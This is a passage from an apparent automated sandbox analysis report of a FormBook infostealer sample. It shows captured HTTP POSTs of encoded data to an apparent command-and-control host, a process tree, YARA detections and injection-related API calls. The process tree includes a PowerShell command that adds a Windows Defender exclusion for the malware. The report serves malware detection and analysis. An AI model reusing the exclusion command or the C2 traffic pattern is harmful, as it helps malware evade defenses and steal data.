Jan 11, 2025 05:36:44.128560066 CET	823	OUT	POST /8s4j/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-us Connection: close Cache-Control: no-cache Content-Length: 223 Content-Type: application/x-www-form-urlencoded Host: www.accusolution.pro Origin: http://www.accusolution.pro Referer: http://www.accusolution.pro/8s4j/ User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; SGH-M919 Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36 Data Raw: 35 74 3d 75 76 4a 72 51 7a 72 56 44 7a 63 75 4a 43 43 69 52 45 4b 37 6f 73 64 72 30 73 65 61 70 68 70 32 39 7a 6d 5a 75 63 79 4e 77 6e 6e 79 59 4f 49 69 74 65 37 31 74 71 35 39 67 61 4f 47 38 57 71 4a 6e 66 6d 67 63 38 58 52 36 7a 55 79 33 78 42 34 4a 78 68 73 74 4f 53 75 74 63 71 34 32 55 63 6b 49 4d 59 34 69 43 48 78 33 6f 6b 58 78 2b 77 2b 55 4f 50 6a 69 34 72 6d 34 49 70 35 55 73 48 73 34 63 6d 7a 6e 68 32 48 64 54 4e 36 6e 46 4f 77 49 45 49 43 67 37 36 2b 4c 42 69 33 33 65 79 76 4f 33 42 79 2b 2f 62 6b 2f 66 54 37 34 37 2b 54 4e 61 50 68 77 45 6a 73 72 75 53 7a 6c 34 61 2b 4f 4b 6e 76 4e 71 6b 64 50 30 34 6e 39 51 4f 34 31 50 6b 4d 50 61 4f 39 51 4e 53 66 Data Ascii: 5t=uvJrQzrVDzcuJCCiREK7osdr0seaphp29zmZucyNwnnyYOIite71tq59gaOG8WqJnfmgc8XR6zUy3xB4JxhstOSutcq42UckIMY4iCHx3okXx+w+UOPji4rm4Ip5UsHs4cmznh2HdTN6nFOwIEICg76+LBi33eyvO3By+/bk/fT747+TNaPhwEjsruSzl4a+OKnvNqkdP04n9QO41PkMPaO9QNSf
Jan 11, 2025 05:36:44.765104055 CET	1236	IN	HTTP/1.1 404 Not Found Connection: close cache-control: private, no-cache, no-store, must-revalidate, max-age=0 pragma: no-cache content-type: text/html content-length: 1251 date: Sat, 11 Jan 2025 04:36:44 GMT server: LiteSpeed Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED] Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0
Jan 11, 2025 05:36:44.765139103 CET	253	IN	Data Raw: 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 33 29 20 69 6e 73 65 74 3b 22 3e 0a 3c 62 72 3e 50 72 6f 75 64 6c 79 20 70 6f 77 65 72 65 64 20 62 79 20 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 Data Ascii: 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></bod

Session ID	Source IP	Source Port	Destination IP	Destination Port
19	192.168.2.8	49734	185.68.108.243	80

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 05:36:46.675502062 CET	1840	OUT	POST /8s4j/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-us Connection: close Cache-Control: no-cache Content-Length: 1239 Content-Type: application/x-www-form-urlencoded Host: www.accusolution.pro Origin: http://www.accusolution.pro Referer: http://www.accusolution.pro/8s4j/ User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; SGH-M919 Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36 Data Raw: 35 74 3d 75 76 4a 72 51 7a 72 56 44 7a 63 75 4a 43 43 69 52 45 4b 37 6f 73 64 72 30 73 65 61 70 68 70 32 39 7a 6d 5a 75 63 79 4e 77 6e 76 79 59 38 77 69 72 4a 6e 31 73 71 35 39 2f 71 4f 46 38 57 72 56 6e 65 4f 6b 63 38 4c 42 36 31 51 79 32 54 5a 34 59 7a 5a 73 36 65 53 75 67 38 71 39 37 30 64 35 49 4d 6f 38 69 47 6a 78 33 6f 6b 58 78 34 55 2b 54 66 50 6a 67 34 72 6c 39 49 70 6c 46 63 48 51 34 63 75 6a 6e 68 43 49 64 44 74 36 6e 68 71 77 4b 58 73 43 70 37 36 38 4d 42 69 52 33 65 4f 77 4f 33 64 45 2b 2b 75 73 2f 59 2f 37 37 71 50 65 59 4f 4c 51 7a 43 72 69 73 50 2b 46 68 71 50 54 44 6f 66 6c 51 71 34 59 5a 69 68 50 78 32 65 4c 36 76 31 31 61 72 4f 77 5a 74 6a 31 73 47 41 6a 46 65 58 31 74 5a 76 52 70 79 4e 62 34 36 33 36 6a 66 39 79 31 47 36 50 44 6d 72 33 37 6f 4d 73 61 35 68 43 68 48 66 74 4e 52 39 37 36 49 58 59 34 45 32 48 76 61 2f 67 75 48 73 70 51 58 73 44 4b 56 31 63 52 30 52 59 65 38 48 33 4f 54 58 52 66 39 54 31 36 51 6d 65 36 77 62 2b 51 6d 48 49 4e 6c 74 65 6d 50 6f 70 42 4a 55 6b 70 4a 4b [TRUNCATED] Data Ascii: 5t=uvJrQzrVDzcuJCCiREK7osdr0seaphp29zmZucyNwnvyY8wirJn1sq59/qOF8WrVneOkc8LB61Qy2TZ4YzZs6eSug8q970d5IMo8iGjx3okXx4U+TfPjg4rl9IplFcHQ4cujnhCIdDt6nhqwKXsCp768MBiR3eOwO3dE++us/Y/77qPeYOLQzCrisP+FhqPTDoflQq4YZihPx2eL6v11arOwZtj1sGAjFeX1tZvRpyNb4636jf9y1G6PDmr37oMsa5hChHftNR976IXY4E2Hva/guHspQXsDKV1cR0RYe8H3OTXRf9T16Qme6wb+QmHINltemPopBJUkpJKAP6XVE6KfwdcsAtV8HjttNORKKEGbbiRFsehA+OxQ6uNef075JrgMTeW9Yp3sjnOHcFKXw26FHwKos2qw9oE+cSwR/42GW+ITruNZLCQUfdFdQwM5HoLYaQf8q00Tx0Jms2ugnFmX8K2+PuPsuLlTFojt1qFH+EI6yf0V3TL6FmIWoO96ffWEbSQ1FtnWowRz906zyH0Yo7plgMm+mzEdDoJ4z407QoSfZmIyCAA3I5vid5cj9fen0V/3EdbMlpHzf1veIsO6KPsuVgPxW98kQytb1QRLvalyvKkxaayPbMtotEggPKLH8rItq/yAdA5HCKLR6S2o7C7ijSG136xm0/ELtiCROMto72TxuD4dAqlPn10UlA3X4LaYGV7107apO5arYHD2EYtO2JUF0WBmU/DgTSqoWtMo2IE77z7BMbeqAH+bVb5sOzw9m0pflQvfnRDdYLcF3K4xVtTvllgwY1kMo0nHVIpUlLNvA227cmhQq+DqSRmO3xU6IY5EW7D3AfluXSUlnoEhN8D0n61l1wIe+smKnDaco9mTRJiku8dnaYMdjqBQWKppAaz+PzRTgeLbWIFYXQfqV69Ae0BZ/PezZAfd/kCxybBHJN3X658OwCzSXddCyXcm2gEQT8lFIRdAULXUtLs3ZNNsD5yXw+LZ6SXNSzkpJ [TRUNCATED]
Jan 11, 2025 05:36:47.297508955 CET	1236	IN	HTTP/1.1 404 Not Found Connection: close cache-control: private, no-cache, no-store, must-revalidate, max-age=0 pragma: no-cache content-type: text/html content-length: 1251 date: Sat, 11 Jan 2025 04:36:47 GMT server: LiteSpeed Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED] Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0
Jan 11, 2025 05:36:47.297523975 CET	253	IN	Data Raw: 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 33 29 20 69 6e 73 65 74 3b 22 3e 0a 3c 62 72 3e 50 72 6f 75 64 6c 79 20 70 6f 77 65 72 65 64 20 62 79 20 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 Data Ascii: 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></bod

Target ID:	0
Start time:	23:34:35
Start date:	10/01/2025
Path:	C:\Users\user\Desktop\SLq0ulC3Wf.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\SLq0ulC3Wf.exe"
Imagebase:	0xeb0000
File size:	836'608 bytes
MD5 hash:	F8048121980AF794FBE2E41741244055
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	23:34:37
Start date:	10/01/2025
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SLq0ulC3Wf.exe"
Imagebase:	0xbb0000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	23:34:37
Start date:	10/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6ee680000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	23:34:37
Start date:	10/01/2025
Path:	C:\Users\user\Desktop\SLq0ulC3Wf.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\SLq0ulC3Wf.exe"
Imagebase:	0x3c0000
File size:	836'608 bytes
MD5 hash:	F8048121980AF794FBE2E41741244055
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	23:34:37
Start date:	10/01/2025
Path:	C:\Users\user\Desktop\SLq0ulC3Wf.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\SLq0ulC3Wf.exe"
Imagebase:	0x30000
File size:	836'608 bytes
MD5 hash:	F8048121980AF794FBE2E41741244055
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	23:34:37
Start date:	10/01/2025
Path:	C:\Users\user\Desktop\SLq0ulC3Wf.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\SLq0ulC3Wf.exe"
Imagebase:	0xde0000
File size:	836'608 bytes
MD5 hash:	F8048121980AF794FBE2E41741244055
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.1717773324.0000000001490000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.1717366921.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.1726811680.0000000001CE0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	23:34:40
Start date:	10/01/2025
Path:	C:\Windows\System32\wbem\WmiPrvSE.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Imagebase:	0x7ff605670000
File size:	496'640 bytes
MD5 hash:	60FF40CFD7FB8FE41EE4FE9AE5FE1C51
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	10
Start time:	23:34:58
Start date:	10/01/2025
Path:	C:\Program Files (x86)\fJHWLGLbtVClBLeesbzoUvokWdEMwcNNFBCKtULjEIIXBiaUoehIKAcPJ\aVqyFNVyPiTfi.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\fJHWLGLbtVClBLeesbzoUvokWdEMwcNNFBCKtULjEIIXBiaUoehIKAcPJ\aVqyFNVyPiTfi.exe"
Imagebase:	0xed0000
File size:	140'800 bytes
MD5 hash:	32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000A.00000002.2678402729.00000000028E0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	11
Start time:	23:34:59
Start date:	10/01/2025
Path:	C:\Windows\SysWOW64\DpiScaling.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\SysWOW64\DpiScaling.exe"
Imagebase:	0x920000
File size:	77'312 bytes
MD5 hash:	D44D3A0F5E53F6ECC5C6232930CFCC5E
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000B.00000002.2676305264.0000000000680000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000B.00000002.2678439595.00000000044C0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000B.00000002.2678329827.0000000004470000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	12
Start time:	23:35:15
Start date:	10/01/2025
Path:	C:\Program Files (x86)\fJHWLGLbtVClBLeesbzoUvokWdEMwcNNFBCKtULjEIIXBiaUoehIKAcPJ\aVqyFNVyPiTfi.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\fJHWLGLbtVClBLeesbzoUvokWdEMwcNNFBCKtULjEIIXBiaUoehIKAcPJ\aVqyFNVyPiTfi.exe"
Imagebase:	0xed0000
File size:	140'800 bytes
MD5 hash:	32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000C.00000002.2681761617.0000000005110000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	16
Start time:	23:35:28
Start date:	10/01/2025
Path:	C:\Program Files\Mozilla Firefox\firefox.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Mozilla Firefox\Firefox.exe"
Imagebase:	0x7ff6d20e0000
File size:	676'768 bytes
MD5 hash:	C86B1BE9ED6496FE0E0CBE73F81D8045
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	9%
Dynamic/Decrypted Code Coverage:	96.4%
Signature Coverage:	0%
Total number of Nodes:	221
Total number of Limit Nodes:	14

Executed Functions

Function 016B3E1C Relevance: .3, Instructions: 301COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1434755670.00000000016B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_16b0000_SLq0ulC3Wf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d7170f1a801f175db7ae2e6c233be27aa9259bc4b3f6ab2de8aa2715320ef14c
Instruction ID: f32c227d9ee78e6d1ee7a93267309eb0cf7cf2cb9c71a256f8f6416bc663d653
Opcode Fuzzy Hash: d7170f1a801f175db7ae2e6c233be27aa9259bc4b3f6ab2de8aa2715320ef14c
Instruction Fuzzy Hash: 57D17274A01209DFDB14DF99C980ADEBBF2BF88300F2581A9D509AB355DB35AD81CF94

Function 016B6F93 Relevance: .2, Instructions: 183COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1434755670.00000000016B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_16b0000_SLq0ulC3Wf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ccc940ac9e024477b6213522ea5a99099571632c91a15e08576246baca684397
Instruction ID: 52c466fc68fd51b6675b7d294b6327a9b8fd5e61a89ef7aaa97a3ad609305710
Opcode Fuzzy Hash: ccc940ac9e024477b6213522ea5a99099571632c91a15e08576246baca684397
Instruction Fuzzy Hash: 80817174E01209CFDB14DFA9C994AEEBBF2AF88300F248169D809AB365DB359D45CF54

Function 07969E03 Relevance: 1.7, APIs: 1, Instructions: 244
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0796A03E

Memory Dump Source

Source File: 00000000.00000002.1461170061.0000000007960000.00000040.00000800.00020000.00000000.sdmp, Offset: 07960000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7960000_SLq0ulC3Wf.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 4086c26fef0d22801f63bdcbf468614a263b9885a57587308a4b3c56cddd5088
Instruction ID: 897bb76db738921fdd566980acb3221ee481857d778495280ef6038507626422
Opcode Fuzzy Hash: 4086c26fef0d22801f63bdcbf468614a263b9885a57587308a4b3c56cddd5088
Instruction Fuzzy Hash: D3915BB1D0031ACFEB10DF69C8457EEBBB6FB49314F148669E808A7240DB749985CF91

Function 07969E08 Relevance: 1.7, APIs: 1, Instructions: 243
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0796A03E

Memory Dump Source

Source File: 00000000.00000002.1461170061.0000000007960000.00000040.00000800.00020000.00000000.sdmp, Offset: 07960000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7960000_SLq0ulC3Wf.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 17880bde6687a62c92fc3a6836c5afed19fad31fe2d25f179051ea837185c3ef
Instruction ID: 96ab5855fb3ecbb74735e7fa168fc80c918e4e277a3c9b98afd0abc06339da97
Opcode Fuzzy Hash: 17880bde6687a62c92fc3a6836c5afed19fad31fe2d25f179051ea837185c3ef
Instruction Fuzzy Hash: F8915BB1D0031ACFEB10DF69C8457EEBBB6FB45314F148669E808A7240DB749985CF91

Function 016BB1F0 Relevance: 1.7, APIs: 1, Instructions: 198
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.1434755670.00000000016B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_16b0000_SLq0ulC3Wf.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: a2463ef48507469f3b84f0c019eac4fe4b732290ab532fcb860fac7b2544e534
Instruction ID: 40dc90055eead00e39dea10a37f12d7dfa9994583099b98d6a7246b149625685
Opcode Fuzzy Hash: a2463ef48507469f3b84f0c019eac4fe4b732290ab532fcb860fac7b2544e534
Instruction Fuzzy Hash: D7714870A00B058FDB24DF6AD8847AABBF5FF88200F10892DD54AD7B50DB75E885CB95

Function 0796C8BF Relevance: 1.6, APIs: 1, Instructions: 116
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.1461170061.0000000007960000.00000040.00000800.00020000.00000000.sdmp, Offset: 07960000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7960000_SLq0ulC3Wf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b389db900432e43a82ec69161649bfe2f680d9e26fdee9c9d1dc5b25fddf7c26
Instruction ID: 3b82867c6feeda692d6795634b8c7d4ad022f6230048267d45bb82d311720741
Opcode Fuzzy Hash: b389db900432e43a82ec69161649bfe2f680d9e26fdee9c9d1dc5b25fddf7c26
Instruction Fuzzy Hash: 7C4146F29043558FDB21CB6588087EFBFF8AF8A618F14425EE095A7241C734A844C7B0

Function 016B590C Relevance: 1.6, APIs: 1, Instructions: 101
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 016B59C9

Memory Dump Source

Source File: 00000000.00000002.1434755670.00000000016B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_16b0000_SLq0ulC3Wf.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: ee3ab27ea88ed20e9ce67f2796bc92414205ca84ee75e3e5e9250ced2848efc0
Instruction ID: 443f7f371ba4d554651b882c5be77ba59a506d7a04ad7febd7f95f499500f847
Opcode Fuzzy Hash: ee3ab27ea88ed20e9ce67f2796bc92414205ca84ee75e3e5e9250ced2848efc0
Instruction Fuzzy Hash: EC41E3B1C00769CBDF24DFAAC8847CEBBB5BF49704F24806AD409AB251DB716986CF50

Function 016B449C Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 016B59C9

Memory Dump Source

Source File: 00000000.00000002.1434755670.00000000016B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_16b0000_SLq0ulC3Wf.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 9de1c21c37dd7093e83e85234eca2aa3827e639ac2ee48b525a5f74d651f9370
Instruction ID: 3209d59a6cbaed5bec323d2a226d987e84202e5b3fe5ca598e5f798c226ca719
Opcode Fuzzy Hash: 9de1c21c37dd7093e83e85234eca2aa3827e639ac2ee48b525a5f74d651f9370
Instruction Fuzzy Hash: E741E2B1C00729CBDB24DFAAC8847CEBBB5BF48304F20816AD409AB251DB716946CF90

Function 0796C828 Relevance: 1.6, APIs: 1, Instructions: 83
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PostMessageW.USER32(?,00000010,00000000,?), ref: 0796C7F5

Memory Dump Source

Source File: 00000000.00000002.1461170061.0000000007960000.00000040.00000800.00020000.00000000.sdmp, Offset: 07960000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7960000_SLq0ulC3Wf.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 1c6840aba826fbcd23cb6974cebc8b7aab71f901269679a26b3d768e072e7b1d
Instruction ID: 65e6453ea9403a5491453b70c699d1f1c0c86d7ce337d7b67cb6a618032e2ad8
Opcode Fuzzy Hash: 1c6840aba826fbcd23cb6974cebc8b7aab71f901269679a26b3d768e072e7b1d
Instruction Fuzzy Hash: C9319FB5D003198FDB20CF99D848BEEBBF8AB89714F10855AE854B7340C734A940CBB1

Function 078003F8 Relevance: 1.6, APIs: 1, Instructions: 75
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DrawTextExW.USER32(?,?,?,?,?,?), ref: 07800497

Memory Dump Source

Source File: 00000000.00000002.1460613640.0000000007800000.00000040.00000800.00020000.00000000.sdmp, Offset: 07800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7800000_SLq0ulC3Wf.jbxd

Similarity

API ID: DrawText
String ID:
API String ID: 2175133113-0
Opcode ID: df05e34f8943eb0e50863cae2c67bb6425bce903b004e9ebb9cc5b0de19d608a
Instruction ID: 41f0fd2996233d71464fc33c609e12f677c7c1d880f8df6a205a3e7dd8b9651a
Opcode Fuzzy Hash: df05e34f8943eb0e50863cae2c67bb6425bce903b004e9ebb9cc5b0de19d608a
Instruction Fuzzy Hash: 273114B5D003499FDB10CFAAD884ADEFBF4FB58324F24842AE418A7250D371A905CFA4

Function 07969778 Relevance: 1.6, APIs: 1, Instructions: 74
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07969810

Memory Dump Source

Source File: 00000000.00000002.1461170061.0000000007960000.00000040.00000800.00020000.00000000.sdmp, Offset: 07960000, based on PE: false

Joe Sandbox IDA Plugin

